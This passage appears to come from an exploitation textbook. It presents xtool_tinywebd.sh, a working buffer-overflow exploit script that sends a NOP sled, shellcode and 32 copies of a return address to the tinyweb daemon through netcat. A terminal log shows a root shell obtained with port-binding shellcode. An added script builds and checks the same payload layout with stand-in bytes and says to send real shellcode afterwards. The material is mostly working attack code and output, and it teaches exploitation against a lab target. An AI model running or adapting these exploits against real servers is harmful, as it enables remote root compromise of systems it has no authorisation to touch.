message. Shell variables hold the offset and the return address used for the
overwrite, so they can easily be changed for a different target. The shellcode
used for the exploit is passed as a command-line argument, which makes this a
useful tool for trying out a variety of shellcodes.
xtool_tinywebd.sh
#!/bin/sh
# A tool for exploiting tinywebd
if [ -z "$2" ]; then # If argument 2 is blank
 echo "Usage: $0 <shellcode file> <target IP>"
 exit
fi
OFFSET=540 # bytes from the start of the buffer to the saved return address
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '` # size of the shellcode file in bytes
echo "shellcode: $1 ($SIZE bytes)"
# NOP sled + shellcode + 32 copies of the return address must total OFFSET+4 bytes
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE))
echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr ($((4*32)) bytes)]"
( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32 . \"\r\n\"";) | nc -w 1 -v $2 80
Notice that the sled size is computed from OFFSET+4 rather than from OFFSET,
while the return-address block is still counted as 128 bytes (32 × 4). The
payload therefore runs four bytes past the offset, so the last copy of the
return address lands exactly on the saved return address at offset 540 and the
31 copies before it cover the 124 bytes just below it. Different compiler
options can move the saved return address around a little, so this makes the
exploit more reliable. The output below shows this tool being used to exploit
the tinyweb daemon once again, but with the port-binding shellcode.
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd.sh portbinding_shellcode 127.0.0.1
target IP: 127.0.0.1
shellcode: portbinding_shellcode (92 bytes)
[NOP (324 bytes)] [shellcode (92 bytes)] [ret addr (128 bytes)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root
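As an added example (not code from the book), the following POSIX sh script builds the same [NOP sled][shellcode][return addresses] layout that xtool_tinywebd.sh streams into nc, but writes it to a file and checks it before anything touches the network: that the buffer is exactly OFFSET+4 bytes long, and that every aligned word of the trailing block, including the word at offset 540, is the return address 0xbffff624. The function names (repeat_bytes, build_payload, word_at, check_payload) are my own; the trailing "\r\n" the real tool appends is omitted because only the layout is being checked; and the 92-byte shellcode file is a constructed stand-in of int3 bytes, not real shellcode. It assumes printf with octal escapes, dd, od, wc and mktemp are available.

```sh
#!/bin/sh
# Added example (not from the book): build the payload layout of
# xtool_tinywebd.sh into a file and verify it before sending anything.
# Assumes a POSIX sh whose printf understands \ooo octal escapes, plus
# dd, od, wc and mktemp. Function names are my own.

OFFSET=540                        # buffer start -> saved return address
NCOPIES=32                        # copies of the return address
RETADDR_HEX=24f6ffbf              # 0xbffff624 little-endian, as od prints it
RETADDR_OCT='\044\366\377\277'    # the same bytes as printf octal escapes

# repeat_bytes ESCAPES COUNT: write COUNT copies of the escaped bytes to stdout
# (ESCAPES is used as a printf format, so it must not contain '%')
repeat_bytes() {
    i=0
    while [ "$i" -lt "$2" ]; do
        printf "$1"
        i=$((i + 1))
    done
}

# build_payload SHELLCODE_FILE OUT_FILE: write [NOP sled][shellcode][ret addrs]
# (without the trailing "\r\n") and print the three segment sizes in bytes
build_payload() {
    size=$(wc -c < "$1" | tr -d ' ')
    sled=$((OFFSET + 4 - NCOPIES * 4 - size))
    if [ "$sled" -lt 0 ]; then
        echo "shellcode too large for this offset" >&2
        return 1
    fi
    {
        repeat_bytes '\220' "$sled"          # 0x90 = NOP
        cat "$1"
        repeat_bytes "$RETADDR_OCT" "$NCOPIES"
    } > "$2"
    echo "$sled $size $((NCOPIES * 4))"
}

# word_at FILE BYTE_OFFSET: the four bytes at that offset as lowercase hex
word_at() {
    dd if="$1" bs=1 skip="$2" count=4 2>/dev/null | od -An -tx1 | tr -d ' \n'
}

# check_payload FILE: succeed only if the file is exactly OFFSET+4 bytes and
# every aligned word of the trailing block, including the one at OFFSET, is
# the return address
check_payload() {
    total=$(wc -c < "$1" | tr -d ' ')
    [ "$total" -eq $((OFFSET + 4)) ] || return 1
    off=$((OFFSET + 4 - NCOPIES * 4))
    while [ "$off" -le "$OFFSET" ]; do
        [ "$(word_at "$1" "$off")" = "$RETADDR_HEX" ] || return 1
        off=$((off + 4))
    done
    return 0
}

# Stand-alone demo with a constructed 92-byte stand-in for the shellcode
# (0xcc int3 bytes, not real shellcode).
demo() {
    dir=$(mktemp -d) || return 1
    repeat_bytes '\314' 92 > "$dir/sc.bin"
    build_payload "$dir/sc.bin" "$dir/payload.bin"
    if check_payload "$dir/payload.bin"; then
        echo "layout OK: word at $OFFSET is $(word_at "$dir/payload.bin" "$OFFSET")"
    else
        echo "layout BAD" >&2
    fi
    rm -rf "$dir"
}
demo
```

With the 92-byte stand-in the script reports 324 92 128, the same figures the tool prints above; swap in a real shellcode file and pipe the checked file (plus "\r\n") through nc yourself once check_payload succeeds. The point of the check is the word at offset 540: if a different offset or a larger shellcode pushes the return-address block off that word, the exploit fails silently, and this catches it before the daemon does.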
Now that the attacking side is armed with an exploit script, consider what
happens when it's used. If you were the administrator of the server running
the tinyweb daemon, what would be the first signs that you were hacked?